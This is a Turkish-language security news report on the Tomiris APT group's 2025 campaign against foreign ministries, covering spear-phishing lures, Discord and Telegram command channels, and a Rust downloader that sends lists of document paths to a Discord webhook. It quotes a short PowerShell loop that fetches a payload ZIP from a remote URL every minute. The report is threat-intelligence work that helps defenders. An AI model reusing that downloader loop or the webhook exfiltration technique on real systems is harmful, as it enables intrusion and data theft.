Tomiris hacker grubu, dünya çapındaki dışişleri bakanlıklarını ve hükümet kuruluşlarını hedef alan karmaşık bir kampanyayla yeniden ortaya çıktı.
Bu gelişmiş kalıcı tehdit (APT) aktörü, 2025’in başlarından itibaren operasyonel stratejisini yüksek değerli diplomatik altyapıya odaklanacak şekilde değiştirdi.
Grup, Go, Rust, C/C++ ve Python dahil çok çeşitli programlama dillerinden yararlanarak, güvenliği ihlal edilmiş ağlar ve kalıcı ortamlarda düşük profili korurken geleneksel güvenlik önlemlerini atlama yeteneğini geliştirdi.
Bu saldırılar genellikle parola korumalı arşivler içeren hassas hedef odaklı kimlik avı e-postalarıyla başlar.
Saldırganlar sıklıkla kötü amaçlı yürütülebilir dosyaları çift uzantılarla gizler veya kurbanları ofis belge simgelerini kullanarak yanıltarak ilk enfeksiyon vektörünün gizlenmesini sağlar.
Bu arşivlerin şifreleri genellikle “min@2025” gibi öngörülebilir bir modeli takip ediyor ancak bu basit gizleme, otomatik e-posta tarayıcılarını etkili bir şekilde atlıyor.
Bu veriler yürütüldükten sonra kalıcılık oluşturmak ve daha fazla kötü amaçlı araç ve arka kapı dağıtmak için tasarlanmış bir olaylar zincirini başlatır.
Securelist güvenlik analistleri, Tomiris’in komuta ve kontrol (C2) iletişimleri için Telegram ve Discord gibi kamu hizmetlerini giderek daha fazla benimsediğini belirtti.
Bu taktiksel evrim, kötü amaçlı trafiğin meşru ağ etkinliğiyle sorunsuz bir şekilde harmanlanmasına olanak tanıyarak, güvenlik ekipleri tarafından kullanılan tespit çabalarını ve stratejileri karmaşık hale getirir.
Ayrıca grup, Havoc ve AdaptixC2 gibi açık kaynaklı sömürü sonrası çerçeveleri kullanmaya başladı ve bu da daha modüler ve esnek saldırı zincirlerine doğru bir hareketin sinyalini verdi.
Analistler, özel implantlar ve açık kaynaklı araçların bu karışımının, ilişkilendirme ve hafifletmeyi savunucular için önemli ölçüde daha zorlu hale getirdiğini vurguladı.
Rust İndirme Mekanizması
Bu kampanyanın göze çarpan bir bileşeni, daha önce belgelenmemiş Tomiris Rust İndiricisidir. Tipik veri filtreleme araçlarından farklı olarak bu implant, .pdf, .docx ve .xlsx dahil olmak üzere hassas dosya türleri için belirli sürücüleri tarayarak hedefli keşif gerçekleştirir.
.webp)
İlginç bir şekilde bu dosyaları hemen çalmaz; bunun yerine dosya yollarının bir listesini derler ve bu verileri çok parçalı bir POST isteği kullanarak Discord web kancasına iletir.
Kötü amaçlı yazılım, sistem bilgileri için bir “payload_json” alanı ve yol listesi için bir “dosya” alanı kullanarak yapılandırılmış veri sızdırmayı sağlar.
.webp)
Kötü amaçlı yazılım, “Program Dosyaları”, “Windows” ve “AppData” gibi belirli dizinleri göz ardı ederek tespit edilmekten kaçınacak şekilde programlanmıştır.
Dosya listesinin başarıyla gönderilmesinin ardından, indirici bir Visual Basic betiği oluşturur (script.vbs) bir PowerShell betiğini yürüten (script.ps1).
Bu komut dosyası, her dakika ikincil bir veriyi (genellikle başka yürütülebilir dosyalar içeren bir ZIP arşivi) almaya çalışan bir döngü içerir.
while($true){
try{
$Response = Invoke-WebRequest -Uri $Url -UseBasicParsing
iwr -OutFile $env:Temp\1.zip -Uri $dUrl
New-Item -Path $env:TEMP\rfolder -ItemType Directory
break
}catch{
Start-Sleep -Seconds 60
}
}Keşif ve aşamalı teslimata yönelik bu titiz yaklaşım, grubun gelecekteki sızma ve kullanım için yüksek değerli verileri sistematik olarak belirlerken tespit edilmeden kalma niyetini vurgulamaktadır.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
